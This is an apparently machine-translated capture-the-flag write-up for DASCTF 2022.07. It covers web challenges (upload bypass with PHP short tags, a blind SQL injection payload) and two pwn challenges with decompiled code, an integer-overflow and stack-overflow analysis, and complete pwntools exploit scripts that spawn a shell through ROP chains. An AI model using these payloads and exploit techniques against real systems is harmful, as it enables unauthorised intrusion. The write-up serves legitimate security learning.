Dasctf2022.07 empowerment competition
2022-07-29 04:27:00 【1-1A0】
food
WEB
Ez to getflag
- Files can be uploaded; the uploaded file must be a PNG image, and only the file-name suffix is checked.
- The `php` characters are filtered; short tags are used to bypass this. - When looking for the file path, it is echoed back,

- There may be a file-inclusion vulnerability.
- Read /flag from the root directory.
- Misled at first: it looked like a file-upload challenge, but it turned out to be file reading.
After the game
Absolute defense
- On opening, it turned out to be a static image.

- Capture the traffic: a pile of JS files and images, all under the /static/ directory.
- Find user-controllable points: search the JS files for web interfaces. The official write-up gave the tool jsfinder. - Found SUPPSERAPI.php; by looking at the source code you can see that the id parameter is restricted: SQL-inject and then bypass the restriction - var reg = /[`[email protected]#$%^&*()_+<>?:"{},./;'[]]/im
- Blind-injection script, directly:
id=1 and ascii(substr((select database()),1,1))>12
PWN
- checksec
ez_for
// Decompiler output (IDA-style) of the challenge's main(): reads a line, runs a
// rand()-based loop, then hands a user-supplied value to vul(). The frame offsets
// in the trailing annotations are the decompiler's; the behaviour depends on them.
int __cdecl main(int argc, const char **argv, const char **envp)
{
__int64 v4; // [rsp+8h] [rbp-38h] BYREF -- only written when v8 == 4, otherwise passed to vul() uninitialized
char buf[36]; // [rsp+10h] [rbp-30h] BYREF
unsigned int seed; // [rsp+34h] [rbp-Ch]
int i; // [rsp+38h] [rbp-8h]
int v8; // [rsp+3Ch] [rbp-4h]
init(argc, argv, envp);
puts("go");
seed = 10; // constant seed: the rand() sequence below is fully predictable
read(0, buf, 0x30uLL); // 48 bytes into a 36-byte buffer; per the frame offsets the extra bytes land on seed, i and v8 -- bound this by sizeof buf
srand(seed);
v8 = 0;
for ( i = 0; i <= 3; ++i )
{
puts("message:");
__isoc99_scanf("%ld", buf); // stores a long at buf; the value read is never compared with anything
if ( (char *)rand() != buf ) // compares rand()'s return value cast to a pointer with the *address* of buf, not with the number just read -- effectively always true
++v8;
}
if ( v8 == 4 ) // given the comparison above, this branch is taken on every run
__isoc99_scanf("%ld", &v4);
return vul((unsigned int)v4); // 64-bit v4 truncated to 32 bits; vul() then mixes signed and unsigned use of it
}
//vul
// Decompiler output of vul(): a1 is the length the caller lets the user choose.
// `buf` here is a global (not shown on this page); `nbytes` is the decompiler's
// name for the stack buffer that is read into.
int __fastcall vul(unsigned int a1)
{
int result; // eax
char nbytes[52]; // [rsp+Ch] [rbp-34h] BYREF
result = system("date"); // spawns a shell for a fixed command; this is also what pulls system() into the binary's PLT
if ( (int)a1 <= 47 ) // signed check on an unsigned length: any value with the top bit set (a "negative" int) passes
{
read(0, &nbytes[4], a1); // a1 is used unsigned here, so such a value reads far more than the 48 bytes that fit -> stack overflow; compare unsigned and bound by sizeof nbytes - 4
return (unsigned int)strncpy(buf, &nbytes[4], 0x200uLL); // copies up to 0x200 bytes out of a 52-byte stack array (over-read) into the global buf; strncpy need not NUL-terminate
}
return result;
}
- Integer overflow: v4 is defined as __int64 in main but as unsigned int in vul. When a negative number is entered, the sign bit is treated as part of the value, which becomes large, so read reads a larger number of bytes. - So there is a stack overflow.
- There is a system() call, but no /bin/sh string. - srand(seed): pseudo-random numbers.

- Exploitation idea:
First get past the random-number comparison.
Pass in a negative number (integer overflow): the comparison is done on int a1, but the value is passed on as unsigned a1, so the check passes while a larger length gets through.
Write the payload: overwrite the return address and at the same time write the back-door string, which is copied into the buf segment — that is our argument address.

# PoC from the write-up for ez_for (pwn4). The addresses below were taken from
# this specific binary (see the ROPgadget commands) and are not portable.
from pwn import *
context(log_level="debug",arch="amd64")
io = process("./pwn4")
elf = ELF("./pwn4")
io.sendlineafter(b"go\n",b"1")
for i in range(4): # any input works: the comparison in main() is effectively always "not equal"
io.sendlineafter(b"message:",b"1")
# v4: integer overflow (negative value, see vul)
io.sendline(b"-1")
# payload construction
sys_plt = elf.plt['system']
#ROPgadget --binary "pwn4" --only "pop|ret"
rdi_addr = 0x400983
# address of buf in the bss segment
buf_addr = 0x06010C0
shell = b'/bin/sh\x00'
# overflow length: the read in vul() starts at &nbytes[4]
payload = shell.ljust(0x38,b"a")
# after several failures, stack alignment turned out to be the problem
#ROPgadget --binary "pwn4" --only "ret"
ret_addr = 0x40063e
payload += p64(ret_addr)+p64(rdi_addr)+p64(buf_addr)+p64(sys_plt)
io.sendline(payload)
io.interactive()
Mycanary2
- checksec
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
- Disassembly
// Decompiler output of MyCanary2's main(): seed the PRNG, then run the menu loop.
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
rand_fd(); // seeds rand() and arms the alarm
start_main(a1, a2); // the menu loop (vulnerable function)
return 0LL;
}
rand_fd
// Decompiler output of rand_fd(): disables stdio buffering, seeds rand() from
// /dev/urandom xor the current time, and arms a 20-second alarm.
unsigned int rand_fd()
{
int v0; // eax
int fd; // [rsp+Ch] [rbp-4h]
setbuf(stdin, 0LL); // unbuffered stdio
setbuf(stdout, 0LL);
setbuf(stderr, 0LL);
fd = open("/dev/urandom", 0); // 0 == O_RDONLY
if ( fd == -1 )
{
printf("can't open /dev/urandom");
exit(-1);
}
read(fd, &qword_4040D0, 8uLL); // return value unchecked: a short read leaves part of the 8-byte value unset
close(fd);
v0 = time(0LL);
srand(v0 ^ qword_4040D0); // srand() takes an unsigned int, so only the low 32 bits of the xor become the seed
return alarm(0x14u); // 20-second watchdog; the value returned is alarm()'s, not a status
}
//vul_func
// Decompiler output of start_main(): a menu loop guarded by a home-made "canary" --
// a stack copy (v2) of the global secret qword_4040D0 that is compared on exit.
__int64 start_main()
{
__int64 result; // rax
char buf[88]; // [rsp+0h] [rbp-70h] BYREF
__int64 v2; // [rsp+58h] [rbp-18h] -- stack copy of the secret, checked on exit
int v3; // [rsp+68h] [rbp-8h] -- menu choice
int v4; // [rsp+6Ch] [rbp-4h] -- loop-exit flag
v4 = 0;
qword_4040D0 = (__int64)rand() << 32; // shift left by 32
qword_4040D0 += rand(); // the secret is two consecutive rand() outputs packed into one 64-bit value
v2 = qword_4040D0;
puts("I have a secret. Can you find it?");
while ( !v4 )
{
menu();
v3 = input_num();
switch ( v3 ) // no default: an unrecognised choice just shows the menu again
{
case 2:
printf("My secret is %016lx\n", qword_4040D0); // discloses the current secret ...
qword_4040D0 = (__int64)rand() << 32;
qword_4040D0 += rand(); // ... and immediately replaces it with the next one
v2 = qword_4040D0; // the stack copy is refreshed here as well
printf("But now, I have a new Secret.");
break;
case 3:
v4 = 1;
break;
case 1:
puts("Show me the code:");
read(0, buf, 0x100uLL); // 0x100 bytes into an 88-byte buffer: per the frame offsets this reaches v2, v3, v4 and the saved frame -- bound by sizeof buf
break;
}
}
result = qword_4040D0;
if ( v2 != qword_4040D0 ) // only catches a clobbered v2 if it was not refreshed by case 2 afterwards
{
printf("Hey, What are you doing?");
exit(0);
}
return result;
}
- Program analysis
In the vulnerable function, we enter a number:
1. Enter data of maximum length 0x100 --- stack overflow
2. The random number v2 is assigned another random number --- prints the random number, but it then changes into another random number
3. v4 = 1, exit the program
- Exploitation idea: because the random number qword_4040d0 is in the bss segment, we cannot change that number. We can overwrite the return address first, then input 2 to re-assign v2, so that v2 == qword_4040d0 holds. At the same time, when overwriting, make sure v4 == 0 (v4 is at var_4).
- There is a back-door function; by searching for /bin/sh you can find its approximate location, then look in the disassembly.
# PoC from the write-up for MyCanary2. The addresses below are specific to this binary.
from pwn import *
io = process("./MyCanary2")
context(arch="amd64",log_level="debug")
shell_addr = 0x401573
# extra ret for stack alignment
ret_addr = 0x40101a
# v4 must stay 0 so the menu loop continues, hence the padding is all \x00
payload = b"\x00"*(0x70+8)+p64(ret_addr)+p64(shell_addr)
# or, more precisely:
#payload=(0x70-8)*b'a'+p64(0)+b"a"*0x8+p64(ret_addr)+p64(shell_addr)
io.sendlineafter(b"Input your choice\n",b"1")
io.sendline(payload)
io.sendlineafter(b"Input your choice\n",b"2") # option 2 refreshes v2 so the exit check passes
io.sendlineafter(b"Input your choice\n",b"3")
io.interactive()
- The official answer analyses the rand() source code and infers the random numbers, using only
inputs 1 (overwrite the original value) and 3 (exit). This may be the point the challenge really wants to examine.
official wp Address : Click on
Reference blog : Address
Summary after the game
The challenges were very good.
I hope I can calm down, analyse slowly and not be impatient.
The goal is to learn something through the competition and slowly reach a qualitative change.
- Understand integer overflow
(unsigned) int: for unsigned, the sign bit of a negative number is treated as data, so a negative number can become very large. - Stack-balance considerations: the stack should be an integer multiple of 0x10, so add a return address.